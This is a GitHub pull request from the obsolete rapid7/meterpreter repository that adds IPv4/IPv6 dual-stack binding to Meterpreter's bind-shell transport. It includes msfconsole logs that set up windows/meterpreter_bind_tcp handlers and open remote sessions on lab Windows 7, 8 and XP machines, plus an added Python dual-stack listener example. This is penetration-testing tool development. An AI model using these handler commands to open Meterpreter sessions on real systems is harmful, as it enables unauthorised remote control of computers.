rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

Bind to IPv4 and IPv6 on the bind transport #142

Closed OJ closed 9 years ago

OJ commented 9 years ago

This PR includes code which attempts to bind to both IPv4 and IPv6 addresses so that the attacker can connect on either interface.

In the case of Windows XP, the IPv6 stack doesn't allow modification of the socket options so that both address types can be listened to on the same socket. Rather than create separate sockets for both cases, XP and earlier simply fall back to IPv4 only.

Verification

On the target (Win7), listener bound to both:

Z:\scratch>stagelessx86-bind.exe

Z:\scratch>netstat -an | findstr 8000
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING
  TCP    [::]:8000              [::]:0                 LISTENING

Z:\scratch>

On the attacker, connecting via IPv4 then IPv6:

msf exploit(handler) > set payload windows/meterpreter_bind_tcp
payload => windows/meterpreter_bind_tcp
msf exploit(handler) > set RHOST 10.1.10.35
RHOST => 10.1.10.35
msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 3 opened (10.1.10.40:47155 -> 10.1.10.35:8000) at 2015-03-30 18:54:35 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.35 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(handler) > set RHOST fe80::d920:55ed:6723:e541
RHOST => fe80::d920:55ed:6723:e541

restart the payload and then...

msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 4 opened (fe80::76d0:2bff:fe2c:7fc4%em1:36579 -> fe80::d920:55ed:6723:e541%em1:8000) at 2015-03-30 18:55:42 +1000

meterpreter > getuid
Server username: WIN-S45GUQ5KGVK\OJ
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] fe80::d920:55ed:6723:e541 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(handler) > 
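
The dual-stack bind with IPv4 fallback that the PR description explains, as an added Python example rather than the PR's own C changes. `allow_dual_stack=False` is a constructed switch that stands in for the Windows XP case where the socket option cannot be changed, and `probe` performs the same check the netstat and msfconsole output above makes by hand.

```python
import socket

def bind_dual_stack(port=0, allow_dual_stack=True):
    """Return (listening_socket, mode); mode is "dual" or "ipv4".

    One AF_INET6 socket with IPV6_V6ONLY cleared accepts IPv6 clients
    and IPv4 clients (seen as v4-mapped addresses). If the stack
    refuses that, as Windows XP does, fall back to an IPv4-only socket.
    allow_dual_stack=False is a constructed switch that forces the
    fallback so the XP path can be exercised; it is not a real OS flag.
    """
    if allow_dual_stack and socket.has_ipv6:
        s = None
        try:
            s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
            # 0 = not v6-only: this one socket also takes IPv4 connects.
            s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
            s.bind(("::", port))
            s.listen(5)
            return s, "dual"
        except OSError:
            if s is not None:
                s.close()
    # Fallback path: plain IPv4 listener, as on XP and earlier.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))
    s.listen(5)
    return s, "ipv4"

def probe(listener, family):
    """Connect to listener over loopback via "ipv4" or "ipv6".

    Returns True if the connection is accepted. A "dual" listener
    answers both; an "ipv4" listener only answers the IPv4 probe.
    """
    port = listener.getsockname()[1]
    fam, target = ((socket.AF_INET6, ("::1", port)) if family == "ipv6"
                   else (socket.AF_INET, ("127.0.0.1", port)))
    listener.settimeout(2)
    try:
        with socket.socket(fam, socket.SOCK_STREAM) as c:
            c.settimeout(2)
            c.connect(target)
            conn, _ = listener.accept()
            conn.close()
            return True
    except OSError:
        return False
```

When auditing listeners, note that a dual-stack socket shows up as two lines in Windows netstat (as in the Win7 output above) but as a single `:::port` line on Linux, so a filter that only looks for `0.0.0.0` bindings misses it.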

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/166/ Test PASSED.

bcook-r7 commented 9 years ago

Looks good on Windows 8.1:

bcook@AUS-MAC:~/projects/metasploit-framework$ ./msfconsole -qx "use exploit/multi/handler; set payload windows/meterpreter_bind_tcp; set rhost 2001::2; run"
payload => windows/meterpreter_bind_tcp
rhost => 2001::2
[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (2001::1:49539 -> 2001::2:4444) at 2015-04-01 21:23:45 -0500

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

msf exploit(handler) > set rhost 192.168.56.102
rhost => 192.168.56.102
msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 3 opened (192.168.56.1:49541 -> 192.168.56.102:4444) at 2015-04-01 21:24:30 -0500

meterpreter > sysinfo
Computer        : WINDOWS-8-VM
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

Windows XP is fine too:

msf exploit(handler) > run

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 4 opened (192.168.56.1:50003 -> 192.168.56.103:4444) at 2015-04-01 21:44:36 -0500

meterpreter > sysinfo
Computer        : BRENT-4D9EAB94D
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

OJ commented 9 years ago

Sorry @bcook-r7, I didn't realise that there was a merge conflict here. This should be fixed up now. Thanks!

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/178/ Test PASSED.

bcook-r7 commented 9 years ago

Hmm, there wasn't when I first tested it. I think I merely forgot to push!

OJ commented 9 years ago

Classic :)

bcook-r7 commented 9 years ago

Thanks man!

OJ commented 9 years ago

Thank you!